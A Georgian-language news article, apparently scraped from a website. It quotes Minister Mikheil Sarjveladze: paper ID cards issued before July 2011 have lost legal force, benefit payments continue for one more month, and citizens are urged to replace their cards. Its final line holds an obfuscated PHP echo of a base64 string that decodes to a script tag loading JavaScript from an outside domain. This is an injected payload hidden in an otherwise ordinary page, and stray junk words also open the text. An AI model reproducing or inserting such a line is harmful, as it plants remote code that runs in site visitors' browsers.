celsiusi
ავერსი შნაიდერი

დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრის მიხეილ სარჯველაძის განცხადებით, ქაღალდის პირადობის მოწმობის მქონე მოქალაქეებისთვის პენსიების და სხვა სოციალური შემწეობის მიღება მომდენო ერთი თვის განმავლობაში არ დაბრკოლდება.

თუმცა, სარჯველაძის განმარტებით, ქაღალდის პირადობის მქონე მოქალაქეებს მოუწოდებს, მომავალში პენსიის ან სხვა სოციალური გასაცემელის გარეშე რომ არ დარჩნენ, მიმართონ იუსტიციის სახლებს და აიღონ თანამედროვე პირადობის მოწმობა.

ჯანდაცვის მინისტრის თქმით, საკმაოდ დიდია ე.წ. ქაღალდის პირადობის მქონე მოქალაქეთა რაოდენობა, რომლებმაც თავიანთი მოწმობები თანამედროვე პირადობის მოწმობით არ შეცვალეს.

„დღეიდან საქართველოში იურიდიული ძალა დაეკარგა 2011 წლის 28 ივლისამდე გაცემულ პირადობის მოწმობებს. ანუ, ამიერიდან იურიდიული ძალის არმქონედ ითვლება ე.წ. ქაღალდის ან ე.წ. ლამინირებული პირადობის მოწმობები. სახელმწიფოს მხრიდან დიდი ძალისხმევა მოხმარდა, რომ ყველას, ვისაც ჰქონდა ე.წ. ქაღალდის პირადობის მოწმობები, შეეცვალათ თავიანთი მოწმობები თანამედროვე პირადობის მოწმობით.

ამ მიზნით, მთავრობის დადგენილებით გათვალისწინებულია უფასოდ პირადობის მოწმობის შეცვლა. მიუხედავად ამისა, საკმაოდ დიდმა ნაწილმა ჩვენი მოქალაქეებისა, რომელთაც აქვთ ე.წ. ქაღალდის პირადობის მოწმობა, არ ისარგებლეს ამ შესაძლებლობით და დღეიდან ამ ადამიანებს აღარ აქვთ მოქმედი პირადობის დამადასტურებელი საბუთი. დაბრკოლება რომ არ შეექმნას ამ ადამიანებს მათთვის გათვალისწინებული პენსიების და სხვა სოციალური შემწეობების მისაღებად, საქართველოს მთავრობამ მიიღო გადაწყვეტილება, მომდევნო ერთი თვის განმავლობაში არ დაბრკოლდება ამ თანხების გაცემა, თუმცა ეს არ ნიშნავს ქაღალდის პირადობის მოწმობებისთვის მოქმედების ვადის გაგრძელებას. ეს ნიშნავს, რომ მხოლოდ სოციალური გასაცემლების მიღებაზე არ შეექმნებათ მოქალაქეებს დაბრკოლება ამ დამატებითი პერიოდის განმავლობაში. ხაზგასმით აღვნიშნავ, რომ ეს წესი დროებითია და ის უსაზღვროდ ვერ გაგრძელდება.

ქაღალდის პირადობის მქონე მოქალაქეები რომ არ დარჩნენ მომავალში პენსიის ან სხვა სოციალური გასაცემელის გარეშე, მინდა, მათ მოვუწოდო, მიმართონ იუსტიციის სახლებს და აიღონ თანამედროვე პირადობის მოწმობა, რათა მომავალში არ შეექმნათ დაბრკოლება პენსიისა და სხვა სოციალური დახმარების მისაღებად, ასევე, სხვა ნებისმიერი მომსახურების მისაღებად, რომლისთვისაც ზოგადად მათ სჭირდებათ პირადობის დადასტურება. სახელმწიფო კვლავაც მაქსიმალურად ხელს შეუწყობს იმ ადამიანებს, რომლებიც მოითხოვენ პირადობის მოწმობის გამოცვლას“, – განაცხადა მიხეილ სარჯველაძემ.

121
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");